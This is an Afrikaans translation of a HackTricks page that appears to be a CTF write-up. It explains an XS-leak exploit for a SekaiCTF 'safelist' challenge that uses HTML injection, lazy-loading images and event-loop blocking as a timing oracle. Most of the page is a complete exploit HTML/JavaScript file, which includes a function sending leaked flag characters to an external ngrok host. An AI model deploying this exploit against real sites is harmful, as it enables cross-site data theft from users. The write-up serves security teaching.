Werk jy in 'n cybersecurity-maatskappy? Wil jy jou maatskappy adverteer in HackTricks? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat? Kyk na die SUBSCRIPTION PLANS!
In hierdie uitbuiting, meng @aszx87410 die luie beeld sykanaal-tegniek deur 'n HTML-injeksie met 'n soort event loop blokkeringstegniek om karakters te lek.
Dit is 'n verskillende uitbuiting vir die CTF-uitdaging wat reeds bespreek is op die volgende bladsy. Kyk vir meer inligting oor die uitdaging:
'n Aanvaller kan 'n plasing inspuit wat begin met 'n "A", dan sal 'n paar HTML-etiket (soos 'n groot <canvas) die meeste van die skerm vul en 'n paar finale <img lazy-etikette om dinge te laai.
As die aanvaller in plaas van 'n "A" dieselfde plasing inspuit, maar begin met 'n "z", sal die plasing met die vlageerste verskyn, dan sal die ingespuite plasing verskyn met die aanvanklike "z" en die grootcanvas. Omdat die plasing met die vlag eerste verskyn het, sal die eerste canvas die hele skerm inneem en die finale <img lazy-etikette wat ingespuit is, sal nie op die skerm sigbaar wees nie, sodat hulle nie gelaai sal word nie.
Dan, terwyl die bot die bladsy toegang, sal die aanvaller fetch-versoeke stuur.
As die beelde wat in die plasing ingespuit is, gelaai word, sal hierdie fetch-versoeke langer neem, sodat die aanvaller weet dat die plasing voor die vlag is (alfabeties).
As die fetch-versoeke vinnig is, beteken dit dat die plasingalfabeties na die vlag is.
Kom ons kyk na die kode:
<!DOCTYPEhtml><html><!--The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.We can use fetch to measure the request time.--><body><buttononclick="run()">start</button><!-- Inject post with payload --><formid=faction="http://localhost:1234/create"method="POST"target="_blank"><inputid=inpname="text"value=""></form><!-- Remove index --><formid=f2action="http://localhost:1234/remove"method="POST"target="_blank"><inputid=inp2name="index"value=""></form><script>let flag ='SEKAI{'constTARGET='https://safelist.ctf.sekai.team'f.action =TARGET+'/create'f2.action =TARGET+'/remove'constsleep= ms =>newPromise(r =>setTimeout(r, ms))// Function to leak info to attackerconstsend= data =>fetch('http://server.ngrok.io?d='+data)constcharset='abcdefghijklmnopqrstuvwxyz'.split('')// start exploitlet count =0setTimeout(async () => {letL=0letR=charset.length-1// I have omited code here as apparently it wasn't necesary// fallback to linerar since I am not familiar with binary search lolfor(let i=R; i>=L; i--) {let c = charset[i]send('try_'+ flag + c)constfound=awaittestChar(flag + c)if (found) {send('found: '+ flag+c)flag += cbreak}}},0)asyncfunctiontestChar(str) {returnnewPromise(resolve => {/*For 3350, you need to test it on your local to get this number.The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.*/// <canvas height="3350px"> is experimental and allow to show the injected// images when the post injected is the first one but to hide them when// the injected post is after the post with the flaginp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()setTimeout(() => {run(str, resolve)},500)})}asyncfunctionrun(str, resolve) {// Open posts page 5 timesfor(let i=1; i<=5;i++) {window.open(TARGET)}let t =0constround=30//Lets time 30 requestssetTimeout(async () => {// Send 30 requests and time eachfor(let i=0; i<round; i++) {let s =performance.now()awaitfetch(TARGET+'/?test', {mode:'no-cors'}).catch(err=>1)let end =performance.now()t += end - sconsole.log(end - s)}constavg= t/round// Send info about how much time it tooksend(str +","+ t +","+"avg:"+ avg)/*I get this threshold(1000ms) by trying multiple times on remote admin botfor example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold*/constisFound= (t >=1000)if (isFound) {inp2.value ="0"} else {inp2.value ="1"}// remember to delete the post to not break our leak oraclef2.submit()setTimeout(() => {resolve(isFound)},200)},200)}</script></body></html>
Werk jy in 'n cybersecurity-maatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? Of wil jy toegang hê tot die nuutste weergawe van die PEASS of laai HackTricks in PDF af? Kyk na die SUBSCRIPTION PLANS!